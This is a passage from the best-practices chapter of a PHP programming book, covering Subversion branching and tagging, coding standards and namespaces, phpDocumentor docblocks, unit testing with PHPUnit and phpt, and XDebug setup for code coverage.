  • 461. Best Practices 437 Discussion A variety of versioning solutions is available, but they can be grouped into two major categories: distributed and non-distributed systems. In distributed systems, each user maintains his or her own repository, and the software typically tracks only changesets (software patches representing changes to the files under version control). Developers then share the changesets with one another, usually maintaining one canonical repository with all the changesets that have been accepted into the project. In non-distributed systems, a repository resides on a central server. Developers individually check out the repository to their own working directories, and check in their changes as they’re completed. Both systems have their benefits and downsides. However, non-distributed systems are more commonly used in PHP projects, so they’re the type you’ll most likely run into. Having a central repository allows you to designate a single location for the canonical version of the software you’re developing. You can easily tie in processes to run pre- and post-commit, perhaps performing unit tests, compiling documentation, or sending commit notifications to a distribution list. As I mentioned, many revision control systems are available, in both proprietary and open source forms. The most popular open source packages, and arguably the most popular revision control systems, are Concurrent Versions System (CVS) and Subversion (SVN). The popularity of the two is, in large part, due to their open source nature; users obtain the tools for free, and can develop their own tools around these without needing to worry about license infringement. Additionally, no proprietary clients are necessary in order to work with these tools. CVS is the grandfather of non-distributed systems, and is the chosen revision control software for high-profile projects such as PHP itself and the PEAR project. 
Subversion is an evolution of CVS, and offers easier syntax for renaming files and directories in a repository, committing entire directory trees, and branching and tagging. This software is used in many modern frameworks, such as eZ Components and the Zend Framework. I personally recommend the use of Subversion for any new PHP projects, as its ease of setup, simple processes for creating pre- and post-commit hook scripts, and integration
  • 462. 438 The PHP Anthology with other tool sets (IDEs and bug-tracking software, for example), are unparalleled among RCSs. Another advantage of Subversion is that the entire tree is versioned; individual files don’t receive their own versions. This feature allows you to make changes to multiple files as a distinct change set. When checking in your code, you can check in a complete change (unit tests, code, and documentation) all in one go. This style of versioning makes it easier later when you need to look through the log files to determine what changed and when, and which files were affected. How can I maintain multiple versions of a single codebase? Your project has just had a successful release, and now you need to support that release. However, you’ve been hard at work and already have new changes you want to introduce for the next release. How can you maintain both code bases, and ensure important fixes in one are ported to the other? Alternatively, perhaps you need to be able to continue development of your web site’s code base, but have a stable, production version of it running as well. How can you keep the two versions separate? Solution Branching and tagging are features common to RCS, allowing you to maintain separate branches of code in your repository. A branch is a separate version of the software that exists independently from other versions and maintains its own history. A tag is a named snapshot of the project at a given point in time. A typical repository layout should look something like this: project/ branches/ tags/ trunk/ We create a branch for each release like so:
    project/
        branches/
            release-1.0.0/
            release-1.1.0/

The use of Subversion allows this task to be completed very easily:

    $ svn copy trunk branches/release-1.1.0 -m '1.1.0 release branch'

Later, if you need to create a point release (a minor version, especially one intended to fix bugs rather than add new features) you can create an appropriate tag:

    $ svn copy branches/release-1.0.0 tags/release-1.0.1 -m '1.0.1 bugfix release'

Similarly, you can create a branch for a production version of a site:

    project/
        branches/
            production/
        tags/
        trunk/

When you’re ready to deploy a software release, create a tag with a name that describes the changes:

    $ svn copy branches/production tags/2006-09-19-PirateDayJargon \
        -m 'Pirate Day Jargon version of site for Pirate Day'

Discussion

In most cases, day-to-day development will occur in the repository trunk. When you’re ready to create a software release, create a branch. From this point forward, changes in the trunk will not affect code in the release branch, unless you merge them manually. Branches provide code separation, which helps you to prevent new features or backward compatibility breaks from creeping into released code. You can also selectively merge bug fixes or new features from one branch to another using your version control system’s merging capabilities. Here’s how the merge command would be used in Subversion, for instance:
    $ svn merge -r 123:145 trunk/filename branches/release-1.0.0/filename

However, an actual release needs to be static (that is, active development must have stopped) and we achieve this with tagging.

In Subversion, tags and branches are created in the same way: via the “copy” operation. The only difference between them lies in the conventions that surround their use. Branches should indicate ongoing development, such as bug fixes, new features, and the like; tags should be considered static snapshots.

One aspect to note is that in Subversion, a copy is stored as a link to the existing tree (much like a hard link) rather than as a duplicate of every file; new data is only stored when a change is checked in against the copy. This means that copies are cheap, so you can, and should, branch and tag often.

“Wait!” you say. “I’m not developing software; I’m developing a web site! How does this apply to me?” Easy now; you still need to be able to keep your development and production versions of the site separate, and your tags should represent points at which you launch bug fixes or new features on the site:

    project/
        branches/
            production/
        tags/
            2006-09-19-PirateDayJargon/
            2006-05-11-LifeUniverseEverything/
            2006-04-01-AprilFools/
        trunk/

On a day-to-day basis, you work in the repository trunk. As you finish features or bug fixes, you merge them into the production branch. You then preview this branch on your staging server, which is almost identical to the production server; it may even use the same data, pulled from the same web services. Once you’ve verified the changes, or your quality assurance team has reviewed the site and given its seal of approval, you create a tag. You can then export the project files from this tag:
    $ svn export \
        http://example.com/svn/project/tags/2006-09-19-PirateDayJargon \
        2006-09-19-PirateDayJargon

svn export grabs code from the repository and creates a clean local copy of the tree without the versioning information (that is, the .svn subdirectories). Unlike a checkout, the result is not a working copy, which gives you a leaner, production-ready code tree to deploy.

How can I write distributable code?

When you’re working in a team, or writing code that will be released to the public, you need to keep several points in mind:

■ Code should be easily reused and extended.
■ Code should be easily readable.
■ Code files should be easily found in the file system.

Common problems developers run into when they’re working on others’ code, or they’re using or extending third-party code, include:

■ difficulty extending code due to inflexible APIs (or lack of an API), or unclear inheritance (for example, how do you extend procedural code?)
■ naming collisions as a result of poor naming practices such as using common names when creating a class (for example, Mail)
■ difficulty reading other people’s code because of inconsistencies with indentation; variable, function, class, and file naming conventions; and code structure

These are obviously separate problems, but all are related to the problem of failing to write distributable code.

Solutions

Distributable code is all about adopting good habits. There’s no single, bullet-proof solution to writing distributable code, but there are a few programming practices you should adopt. Turning them into programming habits will also mean that writing distributable code will take no extra effort at all. Let’s take a look at three different programming practices you should consider.
Using OOP

If you haven’t done so yet, make sure you read “What is OOP?” in Chapter 1.

Object oriented programming (OOP) is often derided by performance experts as being very costly to an application’s performance.6 The counter-argument is that CPU cycles and memory are cheap, while developers are not. OOP provides incredible benefits to developers: object oriented code is very easily reused and extended, it’s typically easier to test because of the testing frameworks now available in PHP, it can reduce the number of naming collisions drastically, and it can lead to shorter syntax in many cases.

6 For documentation of PHP 5’s OOP feature set, visit http://www.php.net/oop5/.

Consider the following example:

oop.php (excerpt)

    class Foo
    {
        public function bar()
        {
            echo 'Do';
        }
    }

    class MyFoo extends Foo
    {
        public function bar()
        {
            parent::bar();
            echo ' more!';
        }
    }

Class Foo has a bar method. Class MyFoo extends class Foo and overrides the bar method. This technique allows a MyFoo object to access the functionality of its parent class by calling parent::bar, and then add its own functionality to the bar method.

The beauty of this approach is that the objects are now interchangeable: we can use either Foo or MyFoo, depending on the situation, and the method syntax remains exactly the same. We can instantiate an object of either class, pass it to other methods or functions, and use either object in exactly the same way without needing to know which class it encapsulates:
    $foo = new Foo();
    $foo->bar();

    $foo = new MyFoo();
    $foo->bar();

If we wanted to achieve the same end using procedural functions, the equivalent code might look like this:

    function foo_bar()
    {
        echo 'Do';
    }

    function myfoo_bar()
    {
        foo_bar();
        echo ' more';
    }

    myfoo_bar();

The actual function call is certainly faster now that we don’t have to instantiate an object, although this benefit is moot with static methods. The downside is that we can’t simply call foo_bar() and get the new behavior; we have to call an entirely different function. If we want to be able to dynamically call a method of our choosing elsewhere in the application, we can’t hard-code the function call; instead, we need to pass a function name or PHP callback. This approach could decrease performance, and also makes debugging and testing more difficult.

Let’s also consider that we may well need to implement similar functionality, but with radically different internals. As an example, we might want to create two different mail functions: one that sends email using the PHP mail function, and another that sends it via SMTP. I’ve witnessed situations where both functions were named mailer, which led to naming conflicts later when both files were loaded simultaneously. If we incorporate these functions into classes instead, using, say, My_Sendmail and My_Smtp as class names, we remove the conflict:
    class My_Sendmail
    {
        public function mailer($to, $subject, $body) {}
    }

    class My_Smtp
    {
        public function mailer($to, $subject, $body, $host = 'localhost') {}
    }

I mentioned earlier that classes are also easier to test than procedural code. This is because the popular and well-documented unit testing frameworks, SimpleTest and PHPUnit, were designed primarily to test class methods, and even define their test suites using classes:

oop.php (excerpt)

    class FooTest extends PHPUnit_Framework_TestCase
    {
        /**
         * Foo Object
         * @var Foo
         */
        protected $_foo;

        /**
         * Setup environment
         */
        public function setUp()
        {
            $this->_foo = new Foo();
        }

        /**
         * Teardown environment
         */
        public function tearDown()
        {
            unset($this->_foo);
        }

        /**
         * Test the bar() method
         */
        public function testBar()
        {
            ⋮ test the method…
        }
    }

Writing object oriented code makes unit testing more intuitive and flexible: each test method tests a method in a class. Should you wish to investigate further, you can read about additional testing strategies on the SimpleTest and PHPUnit web sites detailed in this chapter’s introduction.

Choosing a Namespace

We’ve mentioned naming conflicts once already. Just because you’re using OOP now doesn’t mean you’re out of the woods; class names may still conflict. The easy way to avoid the problem is to choose a namespace, a name prefix generally based on the project name or vendor name, with which to prefix your classes.7 Here are some examples of namespaces that are in use within existing projects:

■ Solar Framework: Solar_
■ Zend Framework: Zend_
■ Cerebral Cortex: Crtx_

7 For a good discussion of the value of namespaces, read Paul M. Jones’s blog entry “No More Loners!” at http://paul-m-jones.com/blog/?p=215.

Using a namespace has several benefits. Firstly, it provides a very easy way to separate your code from that of other projects. If you make your code available through a PEAR channel, for instance, having your own prefix means that your code will be grouped under a single tree within your local PEAR checkout.

Secondly, as I’ve already mentioned, selecting a namespace helps to prevent naming conflicts. Uri may be the shortest name that adequately describes your class, but it could then conflict with another vendor’s Uri class; prefix it with your own namespace, and the problem is avoided: Zend_Uri, Solar_Uri, My_Uri.

What should you use for your namespace? If you represent a company or a public project, try to use its name; after all, this approach is good enough for Solar and Zend. Also, try to keep the name short; you’ll appreciate not needing to type as many keystrokes every time you create a new class definition. That said, a name can be too short: you should probably use no fewer than three characters in order to ensure that the name is unique and spells something recognizable. Crtx, for instance, is recognizable as a truncation of “Cerebral Cortex”; anything shorter would be unrecognizable, Cortex itself starts to get lengthy as a prefix, and CerebralCortex is simply too long to be usable.

Choosing a Coding Standard

How many times have you reformatted a coworker’s (or former employee’s) code to make it more readable? How many times has someone done the same to your code? We can consider such actions to be a net loss of coding time. Chances are that if this has happened too much in your shop, you’ve probably already decided to create a coding standard.

Coding standards dictate:

■ file naming and placement
■ variable, function, and class naming conventions
■ indentation rules
■ documentation and comment guidelines

… and much, much more.

Rather than creating your own standard, consider adopting a public standard. The benefits of using a public standard include:

It’s programmer-neutral.
    Instead of one programmer or group of programmers dictating their own preferences, choosing a public standard is a programmer-neutral solution.

The issues have been settled.
    A public standard will have undergone heavy debate already. While not everyone will be able to agree that the outcome is the best one, everyone has agreed that the standards represent the best collective solutions.

Use it as a hiring criterion.
    When adopting a public standard, you can use it as a criterion of employment: “Applicant must know and be able to use XYZ Coding Standards.”

It’s better for code distribution.
    For instance, if you’re following PEAR Coding Standards, your code will be in a format (both the physical, on-disk format, as well as the format in which the code is written) that can easily be packaged and installed using the PEAR installer, or via a PEAR channel.

So, what public standards exist? Some popular examples include:

■ PEAR, at http://pear.php.net/manual/en/standards.php
■ Zend Framework, at http://framework.zend.com/manual/en/coding-standard.html
■ eZ Components, at http://svn.ez.no/svn/ezcomponents/docs/guidelines/

With some additions of their own, these coding standards were all originally derived from the Horde project.8 Horde and PEAR coding standards are identical at this point. Zend Framework standards basically follow those of PEAR, with a few slight changes; all in all, however, Zend Framework remains compatible with PEAR. eZ Components standards are basically only used by the eZ Components project and those developers who code with it. PEAR coding standards are widely adopted, and used in other high-profile projects such as ADOdb9 and Solar.10 Overall, when it comes to choosing a standard to adopt for your project or company, PEAR’s standards are probably the best option.

8 http://horde.org/
9 http://adodb.sourceforge.net/
10 http://solarphp.com/

The basics of PEAR coding standards are summarized as follows:

■ There is one class per file.
■ Underscores in class names map to the directory separator: for example, Net_SMTP maps to Net/SMTP.php.
■ There is One True Brace: class and function declarations have the opening brace on the following line at the same indentation level as the declaration; in other control structures, the opening brace remains on the same line as the statement.
■ Code indentation should equal four spaces per indentation level.
■ Variables, functions, and classes are named using camelCase or studlyCaps; variable and function names should begin lowercased, while classes should begin uppercased.
■ Private and protected properties and methods should be named with a leading underscore.
■ All classes, functions, and methods should have a docblock.

All the examples in this chapter are written using PEAR coding standards.

Discussion

Writing distributable code is achievable once you adopt a few useful habits. Writing object oriented code may not give your projects a performance advantage, but it will help you develop code faster, as you’ll be able to easily reuse code that you or others have already written. Choosing a namespace for your code will help prevent collisions with code written by other developers, and provides for the easy grouping of different code bases in the directory tree. Finally, using a coding standard lets you ensure that you’ll be able to maintain the code of your fellow programmers, and vice versa.

How can I document my code for later reference by myself or others?

You’ve written the next great API, and you’re all ready to release it. But nobody, including your coworkers, knows how to use it. What methods are available? What arguments do they take? What do they return? What do they actually do? Why would anyone want to use them?

The topic of documentation is often skimmed over during the coding phase, but as you can see from these questions, a lack of documentation can make your code basically worthless to others.

“But I don’t have time to document!” you protest. “Documentation is too hard!” This is simply not true. Documentation can be created while you code, as part of your code. Let’s see how.
Solution

phpDocumentor uses specially formatted comment blocks, called docblocks, within the code itself to generate documentation.11 Docblocks have existed for a number of years, having originally been written to support PHP 4 code, and are based on Javadoc.12

11 http://phpdoc.org/
12 http://java.sun.com/j2se/javadoc/

Docblocks start with an opening /**, and then follow regular C-style comment format. Each subsequent line of a multiline comment block should start with a *. Here’s an example:

login.php (excerpt)

    /**
     * This is a sample docblock
     *
     * This is a sample docblock. Content prior to the first empty line
     * of the comment block is called the 'short description'; this
     * content here is considered the 'long description'.
     */

Docblocks can also contain tags that provide meta information, such as the function or method parameters and return value types, the exceptions thrown, and more. As an example, consider the following function declaration:

login.php (excerpt)

    /**
     * Login a user
     *
     * Logs in a user, applying their credentials against those found in
     * the database.
     *
     * @param string $user Username
     * @param string $password User's password
     * @return boolean
     * @throws Exception on database error
     */
    function login($user, $password)
    {
        ⋮ function body…
    }
Running this declaration through phpDocumentor is a fairly simple exercise:

    $ phpdoc -f login.php -t docs

This action creates a documentation tree inside the docs directory, and parses only the login.php file. The documentation generated for this function can be seen in Figure 13.1.

Figure 13.1. Documentation generated with phpDocumentor and docblocks

You can link documented code using two different mechanisms. Any given docblock may contain one or more @see tags, each of which takes a single argument: a class, function, or method name, or a documented constant, variable, object property, or object constant. An optional second argument can be used to provide information about the link. Alternatively, you can generate inline links using the {@link argument comment} syntax; the argument is the same as the one we used for @see, and the comment we provide will become the text that will be linked (if none is provided, the argument is used). Here’s an example:
login.php (excerpt)

    /**
     * Validate a password
     *
     * Validates a password for {@link login() the login function}.
     *
     * @see login() Login function
     * @param string $user Username
     * @param string $password User's password
     * @return boolean
     */
    function validatePassword($user, $password)
    {
        ⋮ function body…
    }

What can be documented with docblocks? Well, a file can have a page-level docblock that describes the contents of the file, its author, copyright information, and so on. Classes can have a docblock describing the class, inheritance, and more. Functions and methods may have docblocks, as we saw previously. Additionally, any class member variable can have a docblock. In short, any element of the code can have a docblock.

Discussion

The main points to note about phpDocumentor-style code comments are:

■ Documentation resides with the code.
■ Documentation refers to the code it precedes.
■ Docblocks make your code self-documenting.

Knowing these points, you really have no reason not to document your code; so as you code, document away to your heart’s content. As you’re doing so, keep a few points in mind:

Use both short and long descriptions, unless they’re basically identical.
    In the example above, the long description provides additional information that’s not necessary for a short synopsis, but gives good information to the developer using it. Often, the parameters and return value provide plenty of information, so you don’t need to use the long description.
Use the most specific parameter and return value types you can.
    For instance, don’t just use a type of object or stdClass if something more specific will work, such as Solar_Db_Adapter. This type will allow you to link to the appropriate class, producing even better documentation; additionally, some IDEs will use such type hinting to better provide code completion.

Another point to keep in mind is that phpDocumentor is not the only tool that can parse docblocks. Another tool that can utilize the same docblocks and docblock tags as phpDocumentor to create API documentation is Doxygen.13 The benefit to using Doxygen is that it supports languages other than PHP, such as C, C++, Java, and Python, and can generate documentation accordingly.

13 http://www.stack.nl/~dimitri/doxygen/

Note also that docblocks are associated with compiler tokens in PHP itself, which means that they may be retrieved through PHP’s Reflection API using the getDocComment method of any of the various Reflection classes. This ability can be useful when you want to program some form of self-discovery into your code, when you’re creating server classes, for instance. Zend Framework makes use of this capability in its various server components (Zend_XmlRpc_Server, Zend_Rest_Server, Zend_Json_Server, and Zend_Soap_Wsdl) in order to have service classes generate their own server definitions.

Finally, many IDEs will use docblocks to provide code completion functionality. For example, as you type in Zend Studio or Eclipse, tool tips and drop-downs appear, displaying the possible methods of an object and the prototype for each method, as Figure 13.2 illustrates. It’s easy to select the entry you want to use from the list and save keystrokes in the process.
Figure 13.2. IDE autocompletion based on PHP docblocks (Zend Studio)

Comments can Tell Lies!

Programmers always have the best of intentions when they implement a systematic approach to using code comments. However, as time goes by and functions are patched, enhanced, or otherwise changed, the code comments will slowly become out of date unless they’re rigorously maintained. When you read someone else’s code comments, remember that they may have written those comments for the function as it was implemented three versions ago, which may not reflect how the function actually works today.

When you approach your own code, try to be as accurate as possible with your commenting, but complement your docblocks with good unit test cases; we’ll look at unit testing in “How can I ensure future changes to my code won’t break current functionality?”. A good unit test suite can serve as functional documentation, too, as it documents how the code will behave when called.

So, start documenting your code today. You’ll never look back!
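To make the Reflection point from the discussion above concrete, here is a minimal sketch of reading a docblock back at run time. It assumes a simplified login function with a placeholder body, and extractParamTags is a hypothetical helper written for this illustration; it is not part of PHP, phpDocumentor, or Zend Framework, and the real server components do considerably more.

```php
<?php
/**
 * Login a user
 *
 * @param  string $user     Username
 * @param  string $password User's password
 * @return boolean
 */
function login($user, $password)
{
    return false; // placeholder body, for illustration only
}

/**
 * Hypothetical helper: map each documented parameter name to its type
 *
 * @param  string $docblock Raw docblock text
 * @return array  Parameter name => documented type
 */
function extractParamTags($docblock)
{
    // Capture "@param <type> <$name>" pairs from the comment text.
    preg_match_all('/@param\s+(\S+)\s+(\$\w+)/', $docblock, $matches, PREG_SET_ORDER);

    $params = array();
    foreach ($matches as $match) {
        $params[$match[2]] = $match[1];
    }
    return $params;
}

// getDocComment() returns the raw docblock, or false if there is none.
$reflection = new ReflectionFunction('login');
$docblock   = $reflection->getDocComment();
$params     = extractParamTags($docblock);

print_r($params);
```

A server class could use a map like this to advertise the argument types of each method it exposes. Note that opcode caches configured to strip comments will make getDocComment return false, so code that depends on docblocks should handle that case.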
How can I ensure future changes to my code won’t break current functionality?

Your application has been in production for a month, and all is well, but your boss has requested a new feature. You create the new functionality, roll it out, and then, within minutes, you have an angry call from your boss, who complains that something’s broken on the site. How many times has this happened to you? How can you prevent it from ever happening again?

Try out one of the unit testing frameworks available to PHP.

Solutions

The goal of unit testing is to isolate code into distinct units and verify that each of those units satisfies all your criteria.14 When they’re run after refactoring processes or the introduction of new features, unit tests are often referred to as regression tests, and are used to check that the changes have not broken existing functionality.

14 Wikipedia has an entry on unit testing, along with references to many unit-testing resources, at http://en.wikipedia.org/wiki/Unit_testing.

Typical testing frameworks have you run code and make assertions against the return values or object state. The examples that follow all reference this code:

Foo.php (excerpt)

    /**
     * Foo class for PHP Anthology Best Practices chapter
     *
     * @package SitePoint
     * @version @release-version@
     * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.
     * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>
     */
    class Foo
    {
        /**
         * @var string
         */
        public $name;

        /**
         * @var boolean
         */
        public $baz = false;

        /**
         * Constructor
         *
         * @param string $name
         * @return void
         * @throws Exception with non-string $name
         */
        public function __construct($name)
        {
            if (!is_string($name) || empty($name)) {
                throw new Exception('Invalid name');
            }
            $this->name = $name;
        }

        /**
         * Bar returns an array
         *
         * @return array
         */
        public function bar()
        {
            // 'bar' is included so that the tests that follow, which
            // assert that the array contains 'bar', can pass
            return array(
                'bar',
                'baz',
                'bal',
                'boo'
            );
        }

        /**
         * Set the {@link $baz} flag
         *
         * @param boolean $flag
         * @return void
         */
        public function baz($flag)
        {
            $this->baz = ($flag) ? true : false;
        }
    }

Let’s look at an example of unit testing performed on the code above:
    $object = new Foo('sitepoint');
    $result = $object->bar();
    $this->assertTrue(is_array($result));
    $this->assertContains('bar', $result);

In this test, we assert that the return value of the Foo object’s bar method is an array and contains the value bar as one element.

Three principal testing frameworks are used by most PHP projects:

phpt (http://qa.php.net/write-test.php)
    The testing format used by the PHP project itself, phpt is primarily found in unit tests written for PEAR modules.

PHPUnit (http://phpunit.de/)
    Originally a PEAR project, but now a standalone project, PHPUnit is a faithful port of Java’s JUnit.15 PHPUnit is written in PHP 5, supports E_STRICT, and is targeted largely at OOP code.

SimpleTest (http://www.lastcraft.com/simple_test.php)
    Written in the early days of PHPUnit to address the lack of Mock Objects and web testing functionality, SimpleTest supports PHP 4, and PHP 5 when it’s not set to report E_STRICT errors.

15 http://www.junit.org/

Testing Using SimpleTest or PHPUnit

SimpleTest and PHPUnit test cases are written as classes, and will typically test an entire class or file of functions at a time. The basic testing strategies of these frameworks are very similar, having only minor differences. I use PHPUnit in the examples to come, partly in order to build on it in upcoming sections; however, the code could be written in SimpleTest with very few changes.

In this example, we’ll test the entire Foo class:

unittest.php (excerpt)

    /**
     * Test class for class Foo
     *
     * @uses PHPUnit_Framework_TestCase
     * @package Sitepoint
     * @subpackage UnitTests
     * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd.
     * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ>
     */
    class FooTest extends PHPUnit_Framework_TestCase
    {
        /**
         * @var Foo
         */
        protected $_foo;

        /**
         * Setup test environment
         *
         * @return void
         */
        public function setUp()
        {
            $this->_foo = new Foo('sitepoint');
        }

        /**
         * Tear down test environment
         *
         * @return void
         */
        public function tearDown()
        {
            unset($this->_foo);
        }

        /**
         * Verify that the constructor properly sets the name attribute
         *
         * @return void
         */
        public function testConstructorSetsName()
        {
            $this->assertEquals('sitepoint', $this->_foo->name);
            $foo = new Foo('anthology');
            $this->assertEquals('anthology', $foo->name);
        }

        /**
         * Verify that non-string $name arguments cause the constructor
         * to throw an exception
         *
         * @return void
         */
        public function testConstructorThrowsExceptionOnBadName()
        {
            $this->_assertConstructorThrows('', 'Empty string should throw exception');
            $this->_assertConstructorThrows(array('boo', 'bar'), 'Array should throw exception');
            $this->_assertConstructorThrows(new stdClass(), 'Object should throw exception');
            $this->_assertConstructorThrows(true, 'Boolean should throw exception');
        }

        /**
         * Helper: assert that constructing a Foo with $name throws
         *
         * The assertion is made outside the try block because fail()
         * reports failure by throwing an exception of its own, which
         * a catch (Exception $e) block would silently swallow.
         *
         * @param mixed $name
         * @param string $message
         * @return void
         */
        protected function _assertConstructorThrows($name, $message)
        {
            $thrown = false;
            try {
                $foo = new Foo($name);
            } catch (Exception $e) {
                $thrown = true;
            }
            $this->assertTrue($thrown, $message);
        }

        /**
         * Verify Foo::bar() returns an array containing the value 'bar'
         *
         * @return void
         */
        public function testBar()
        {
            $bar = $this->_foo->bar();
            $this->assertTrue(is_array($bar));
            $this->assertContains('bar', $bar);
        }

        /**
         * Verify that baz() sets the $baz property
         *
         * @return void
         */
        public function testBazSetsBazProperty()
        {
            $this->_foo->baz(true);
            $this->assertTrue($this->_foo->baz);
            $this->_foo->baz(false);
            $this->assertFalse($this->_foo->baz);
            $this->_foo->baz(1);
            $this->assertTrue($this->_foo->baz);
            $this->_foo->baz(0);
            $this->assertFalse($this->_foo->baz);
        }
    }

In this example, the setUp method is called prior to each test case being run, and creates a Foo object. The tearDown method is called after each test case, and, in this instance, unsets the Foo object in the test suite.

Any method that begins with the word test is a test method. In the examples we’ve covered, I’ve named each method to reflect either the class method being tested, or the behavior I’m testing. Thus, the name testConstructorSetsName indicates that this method will test that the constructor (__construct) sets the $name property in the object correctly.

Behavioral testing such as this is particularly useful because, as well as serving as contracts for the objects, the test cases themselves can serve as agile documentation, that is, documentation automatically generated from unit tests. PHPUnit will generate agile documentation based on unit test names. For example, the documentation generated for the method called testConstructorSetsName would be “Constructor sets name.”
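The name-to-sentence conversion described above can be sketched in a few lines. This is only an illustration of the idea, not PHPUnit’s own implementation: describeTestMethod is a hypothetical function name, and the splitting rule (a space before each capital letter that follows a lowercase letter or digit) is an assumption that happens to fit the test names used in this chapter.

```php
<?php
/**
 * Hypothetical helper: turn a test method name into a readable sentence
 *
 * @param  string $methodName For example, testConstructorSetsName
 * @return string
 */
function describeTestMethod($methodName)
{
    // Drop the leading "test" prefix.
    $name = preg_replace('/^test/', '', $methodName);

    // Insert a space at each lowercase-to-uppercase boundary.
    $words = preg_replace('/(?<=[a-z0-9])(?=[A-Z])/', ' ', $name);

    // Lowercase everything, then capitalize the first letter.
    return ucfirst(strtolower($words));
}

$methods = array(
    'testConstructorSetsName',
    'testConstructorThrowsExceptionOnBadName',
    'testBazSetsBazProperty',
);

foreach ($methods as $method) {
    echo describeTestMethod($method), "\n";
}
```

The practical consequence is that a test method name is worth choosing carefully: a name that states the expected behavior reads as a line of documentation, while a name like testFoo1 tells the reader nothing.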
Testing Using phpt

I skipped over phpt testing in the solution above, so let’s take a quick look at it now. phpt tests typically target a single function or method at a time, with the goal of breaking the functionality that unit provides. Test files are divided into several sections that define, at a minimum, the test name, the code to test, and the expected results. Tests are run via a script provided with the PHP distribution: run-tests.php, or the pear run-tests command.

To test the Foo::bar method, we might write the following hypothetical test:

    --TEST--
    Foo::bar() method
    --FILE--
    <?php
    require_once 'Foo.class.php';
    $foo = new Foo('simpletest');
    $bar = $foo->bar();
    assert(is_array($bar));
    assert(in_array('bar', $bar));
    ?>
    --EXPECT--

You’ll note that the --EXPECT-- section here is empty. The idea is that no output is expected; the test will fail if any output, such as a warning from the assert statements, is generated.

This next example sets up a testing scaffold that includes the source PHP file for the class to test, and creates the object to test. There are no formal procedures for creating test scaffolds with phpt tests, but one common convention is to create a setup.php.inc file, like so:

setup.php.inc

    <?php
    require_once 'Foo.class.php';
    $foo = new Foo('simpletest');
    ?>

That file performs the setup for us; we then require it in our test script:
  • 485. Best Practices 461 phpt.php (excerpt) --TEST-­ Foo::bar() method --FILE-­ <?php require_once 'setup.php.inc'; $bar = $foo->bar(); assert(is_array($bar)); assert(in_array('bar', $bar)); ?> --EXPECT-­ phpt tests are generally very easy to write, and offer the advantage that each test is run in its own environment so, for instance, you don’t have to worry about resetting static variables values between requests. The big disadvantages of phpt tests are the lack of a formal method for the setup and teardown of test environments, and the proliferation of files that occurs when we test classes with many methods. Discussion Additional reasons to choose a testing framework like SimpleTest or PHPUnit over phpt include: phpt lacks formal methods for assertions. Certainly, PHP’s own assert function offers the same functionality, but methods like assertTrue and assertContains have better names that indicate the type of assertion being made, and contain their own error handling functionality to ensure that the arguments provided conform to those expected. phpt lacks formal methods for setting up and tearing down the test environment. While phpt offers mechanisms for setting up the request environment, they need to be performed in each test file; this deficiency also makes it difficult to share environments between tests. phpt lacks mechanisms for sharing testing functionality between tests. In PHPUnit and SimpleTest, any method that doesn’t begin with the word test is just another method in the class, which means that you can create a more generalized method and call it from the individual test methods if several tests use similar testing strategies. The ability to easily share an environment without
  • 486. needing to load additional files or classes is especially useful, for obvious reasons.

If SimpleTest and PHPUnit are so similar, how can you choose one over the other? The tool you use will depend on what you’ll be testing, and the test strategies you’ll use. Each testing framework has features that the other does not (although the feature sets are converging as the years progress). For example:

■ PHPUnit includes support for code coverage reports (using XDebug; this topic is covered later in “How can I determine what remains to be tested?”).
■ SimpleTest contains support for Mock Objects (PHPUnit 3 introduces this capability).
■ SimpleTest has web testing functionality (PHPUnit 3 introduces this capability through a third-party tool, Selenium RC).
■ SimpleTest has a very active user community.

I use PHPUnit extensively, mainly because it suits the projects I contribute to and the coding standards that I follow, yet I’ve met many developers who swear by SimpleTest. Choose one testing framework and learn its ins and outs, then investigate the other to compare their strengths and weaknesses.

Unit testing is a broad topic, and much of the information presented here is, by necessity, abbreviated. Choose a testing framework that suits your needs, and read up on the documentation for that framework as you start to write your tests. You may want to read up on unit testing in general as well.

One subject that I haven’t covered here is the concept of Test Driven Development (TDD), or Test First Development. The basic tenet of TDD is to write unit tests first, then your code, and repeat the process until your project is complete. Many developers practice this strategy; it has many benefits, particularly when you refactor code or add features.
For more information on TDD, see the Portland Pattern Repository wiki,16 and ExtremeProgramming.org.17

16 http://c2.com/cgi/wiki?TestDrivenDevelopment
17 http://www.extremeprogramming.org/rules/testfirst.html
  • 487. How can I determine what remains to be tested?

Regardless of whether you’re using Test Driven Development or writing your tests after the fact, eventually you’ll need to know how much of your code has actually been tested. Often, even though your tests are passing, substantial portions of your code won’t have been exercised by your tests. How can you determine which code has been exercised, and which has not?

Solution

PHPUnit 3 provides the ability to generate code coverage reports.18 This feature requires XDebug to be installed on your machine. You can obtain XDebug via PEAR or PECL, or download the extension yourself.19 In my experience, users of *nix-based machines will need to compile the extension themselves. To do so, use the following steps, substituting the appropriate paths, of course:20

    $ cd /path/to/xdebug/sources
    $ /path/to/phpize
    $ ./configure --with-php-config=/path/to/php-config
    $ make
    $ make install

Once XDebug is installed, you’ll need to enable the extension in your php.ini file. Since this extension needs to interact with the Zend Engine, you must enable it as a zend_extension:

    zend_extension = /full/path/to/xdebug.so

The full path is absolutely necessary if the extension is to be found by the PHP engine.

18 For documentation on PHPUnit’s code coverage report facilities, read the online documentation at http://www.phpunit.de/pocket_guide/3.0/en/code-coverage-analysis.html.
19 http://xdebug.org/
20 I originally covered this process in a blog entry entitled, “Getting XDebug Working with PHPUnit For Code Coverage Reports,” at http://weierophinney.net/matthew/.
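Before generating coverage reports, it can help to confirm that PHP actually loaded the extension. The following is only a minimal sketch, not part of PHPUnit or XDebug: the helper name coverageDriverStatus is hypothetical, and it relies solely on PHP’s built-in extension_loaded and phpversion functions.

```php
<?php
// Hypothetical helper: reports whether a named extension is loaded.
function coverageDriverStatus(string $extension = 'xdebug'): string
{
    if (!extension_loaded($extension)) {
        return "$extension is not loaded; check the zend_extension line in php.ini";
    }
    // phpversion() returns the extension's version string, or false if unknown.
    $version = phpversion($extension);
    return "$extension is loaded" . ($version !== false ? " (version $version)" : '');
}

echo coverageDriverStatus(), PHP_EOL;
```

Running this from the CLI checks the configuration the command line uses, which may differ from the php.ini your web server reads.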
  • 488. You’ll also want to disable the extension by default (there’s no need to slow down your site unless you’re actually doing some profiling or checking code coverage). This can also be done in your php.ini:

    xdebug.default_enable = Off

While the code coverage reports run from the CLI, you may need to restart your web server after all the installation tasks and INI changes have been performed.

Once XDebug is available, generating code coverage reports is as easy as throwing another switch to PHPUnit:

